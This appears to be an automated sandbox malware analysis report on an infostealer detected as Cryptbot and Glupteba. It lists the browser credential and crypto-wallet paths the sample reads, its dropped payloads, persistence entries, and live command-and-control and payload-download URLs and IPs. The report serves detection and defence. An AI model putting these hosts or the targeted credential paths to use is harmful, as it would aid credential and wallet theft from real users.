Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_00417091 cpuid
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_00414240 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0042A574 _free,_free,_free,GetTimeZoneInformation,_free
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\File.exe; Code function: 10_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

Stealing of Sensitive Information:

Yara detected Cryptbot
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Yara detected Glupteba
Source: Yara match; File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 7yyqdBJVGf.exe; String found in binary or memory: %AppData%\Electrum-btcp\wallets
Source: 7yyqdBJVGf.exe; String found in binary or memory: %AppData%\ElectronCash\wallets
Source: 7yyqdBJVGf.exe; String found in binary or memory: %AppData%\Jaxx\Local Storage
Source: 7yyqdBJVGf.exe; String found in binary or memory: %AppData%\Exodus\backup
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi

Remote Access Functionality:

Yara detected Cryptbot
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Yara detected Glupteba
Source: Yara match; File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 11 | Startup Items 1 | Startup Items 1 | Deobfuscate/Decode Files or Information 11 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 2 | Access Token Manipulation 1 | Scripting 11 | Input Capture 11 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 12 | Logon Script (Windows) | Process Injection 112 | Obfuscated Files or Information 3 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 2 | Software Packing 13 | NTDS | System Information Discovery 57 | Distributed Component Object Model | Input Capture 11 | Scheduled Transfer | Application Layer Protocol 24 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Query Registry 1 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 2 | Cached Domain Credentials | Security Software Discovery 541 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 341 | DCSync | Process Discovery 11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Virtualization/Sandbox Evasion 341 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 112 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Remote System Discovery 11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery 2 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop

                      Behavior Graph

Behavior Graph ID: 492301; Sample: 7yyqdBJVGf.exe; Startdate: 28/09/2021; Architecture: WINDOWS; Score: 100
Top-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 10 other signatures
Processes started at the top level: 7yyqdBJVGf.exe, IntelRapid.exe, IntelRapid.exe, rundll32.exe

• 7yyqdBJVGf.exe
  Contacts: pacdpo22.top (45.140.167.227, 49752, 80, THEFIRST-ASRU, United Kingdom); zukelx03.top (185.185.71.183, 49756, 49757, 80, SPRINTHOSTRU, Russian Federation); moreil02.top (104.168.214.97, 49755, 80, HOSTWINDSUS, United States)
  Drops: C:\Users\user\AppData\Local\Temp\File.exe (PE32); C:\Users\user\AppData\Local\...\lv[1].exe (PE32)
  Signatures: Detected unpacking (overwrites its own PE header); Self deletion via cmd delete; Tries to harvest and steal browser information (history, passwords, etc)
  Starts: File.exe; cmd.exe
• IntelRapid.exe (top level)
  Signatures: Query firmware table information (likely to detect VMs); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
• File.exe (started by 7yyqdBJVGf.exe)
  Drops: C:\Users\user\AppData\Local\...\wheezy.exe (PE32); C:\Users\user\AppData\Local\...\parted.exe (PE32+); C:\Users\user\AppData\Local\Temp\...\UAC.dll (PE32); 3 other files (none is malicious)
  Signatures: Multi AV Scanner detection for dropped file
  Starts: parted.exe; wheezy.exe
• cmd.exe (started by 7yyqdBJVGf.exe)
  Signatures: Submitted sample is a known malware sample; Obfuscated command line found; Uses ping.exe to check the status of other devices and networks
  Starts: conhost.exe; timeout.exe
• parted.exe (started by File.exe)
  Drops: C:\Users\user\AppData\...\IntelRapid.exe (PE32+)
  Signatures: Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
  Starts: IntelRapid.exe
• wheezy.exe (started by File.exe)
  Signatures: Machine Learning detection for dropped file
  Starts: cmd.exe; dllhost.exe
• IntelRapid.exe (started by parted.exe)
  Signatures: Query firmware table information (likely to detect VMs); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
• cmd.exe (started by wheezy.exe)
  Starts: cmd.exe; conhost.exe
• cmd.exe (started by the previous cmd.exe)
  Signatures: Obfuscated command line found
  Starts: Bisogna.exe.com; PING.EXE; findstr.exe
• Bisogna.exe.com (started by cmd.exe)
  Signatures: May check the online IP address of the machine
  Starts: Bisogna.exe.com
• PING.EXE (started by cmd.exe)
  Contacts: 127.0.0.1
• findstr.exe (started by cmd.exe)
  Drops: C:\Users\user\AppData\...\Bisogna.exe.com (Targa)
• Bisogna.exe.com (started by Bisogna.exe.com)
  Contacts: ip-api.com (208.95.112.1, 49836, 80, TUT-ASUS, United States); 192.168.2.1; YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR
  Starts: wscript.exe
• wscript.exe (started by Bisogna.exe.com)
  Contacts: iplogger.org (88.99.66.31, 443, 49849, HETZNER-ASDE, Germany)
  Signatures: System process connects to network (likely due to code injection or exploit); May check the online IP address of the machine


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
7yyqdBJVGf.exe | 53% | Virustotal |
7yyqdBJVGf.exe | 49% | ReversingLabs | Win32.Trojan.Ulise
7yyqdBJVGf.exe | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\foler\olader\acledit.dll | 0% | Metadefender |
C:\Program Files (x86)\foler\olader\acledit.dll | 0% | ReversingLabs |
C:\Program Files (x86)\foler\olader\acppage.dll | 0% | Metadefender |
C:\Program Files (x86)\foler\olader\acppage.dll | 0% | ReversingLabs |
C:\Program Files (x86)\foler\olader\adprovider.dll | 0% | Metadefender |
C:\Program Files (x86)\foler\olader\adprovider.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe | 33% | ReversingLabs | Win32.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\File.exe | 33% | ReversingLabs | Win32.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\dislip\parted.exe | 36% | ReversingLabs | Win64.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe | 9% | ReversingLabs | Win32.Backdoor.Generic
C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe | 36% | ReversingLabs | Win64.Infostealer.ClipBanker

                      Unpacked PE Files

Source | Detection | Scanner | Label
13.0.wheezy.exe.4e0000.0.unpack | 100% | Avira | TR/Dropper.Gen
13.2.wheezy.exe.4e0000.0.unpack | 100% | Avira | TR/Dropper.Gen
24.2.Bisogna.exe.com.f90000.1.unpack | 100% | Avira | HEUR/AGEN.1139525
0.2.7yyqdBJVGf.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1142240

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://pacdpo22.top/index.php | 0% | Virustotal |
http://pacdpo22.top/index.php | 0% | Avira URL Cloud | safe
http://moreil02.top/index.php | 0% | Virustotal |
http://moreil02.top/index.php | 0% | Avira URL Cloud | safe
http://zukelx03.top/downfiles/lv.exe | 12% | Virustotal |
http://zukelx03.top/downfiles/lv.exe | 100% | Avira URL Cloud | phishing
https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s | 0% | Avira URL Cloud | safe
http://zukelx03.top/download.php?file=lv.exe | 0% | Avira URL Cloud | safe
http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
zukelx03.top | 185.185.71.183 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
iplogger.org | 88.99.66.31 | true | false | | high
pacdpo22.top | 45.140.167.227 | true | false | | high
moreil02.top | 104.168.214.97 | true | false | | high
YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR | unknown | unknown | false | | high

                                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://pacdpo22.top/index.php | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://iplogger.org/1N5Jh7 | false | | high
http://moreil02.top/index.php | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://ip-api.com/json | false | | high
http://zukelx03.top/downfiles/lv.exe | true | 12%, Virustotal; Avira URL Cloud: phishing | unknown
http://zukelx03.top/download.php?file=lv.exe | false | Avira URL Cloud: safe | unknown

                                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
https://duckduckgo.com/chrome_newtab | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
https://duckduckgo.com/ac/?q= | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
http://ip-api.com/jsoncountryCodeinvalid | Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp | false | | high
http://ip-api.com/jsonC: | Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmp | false | | high
http://ip-api.com/jsonQ | Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | false | | high
http://ip-api.com/jsonq | Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | false | | high
http://ip-api.com/jsonH | Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.dr | false | | high
https://evernote.com/ | File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | false | | high
https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s | Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | false | | high
http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string | Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                                    Contacted IPs


                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
45.140.167.227 | pacdpo22.top | United Kingdom | 29182 | THEFIRST-ASRU | false
104.168.214.97 | moreil02.top | United States | 54290 | HOSTWINDSUS | false
88.99.66.31 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
185.185.71.183 | zukelx03.top | Russian Federation | 35278 | SPRINTHOSTRU | false

                                                                    Private

                                                                    IP
                                                                    192.168.2.1
                                                                    127.0.0.1

                                                                    General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 492301
Start date: 28.09.2021
Start time: 15:22:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 7yyqdBJVGf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@34/34@6/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.5%)
• Quality average: 83.1%
• Quality standard deviation: 26.6%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.50.102.62, 67.26.75.254, 8.248.145.254, 67.26.83.254, 8.248.139.254, 8.248.119.254, 20.199.120.151, 20.199.120.85, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.199.120.182
                                                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, vip1-wns2-par02p.wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time      Type              Description
15:24:22  Task Scheduler    Run new task: Intel Rapid path: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
15:24:27  Autostart         Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk
15:26:14  API Interceptor   2x Sleep call for process: Bisogna.exe.com modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\foler\olader\acledit.dll
Process: C:\Users\user\AppData\Local\Temp\File.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 8704
Entropy (8bit): 4.699710473704491
Encrypted: false
SSDEEP: 192:peH8gcV+GQqYTBBBAkvyMQ0F3OWYTWPGP:YH8gcV+GQqyAMD0WYTWPq
MD5: 8D96CB171B4138F43A754317BE9E982C
SHA1: 3C2975E7904486F39BE0455A63AFAA063064A93E
SHA-256: 727B96DCA0363F7CD5767F94BF72E0655EF1D00F44B27D496DEB733EB32BE12B
SHA-512: AB58BD28169042D9502F64410E78AA41D219753D998AD5309699C57B50CE343B50AEB42DDA8EF6A52F8057DCD1BC2B4B6E0DE52819285DD3517BA3FA032E6EE3
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
C:\Program Files (x86)\foler\olader\acppage.dll
Process: C:\Users\user\AppData\Local\Temp\File.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 46592
Entropy (8bit): 6.143306131333313
Encrypted: false
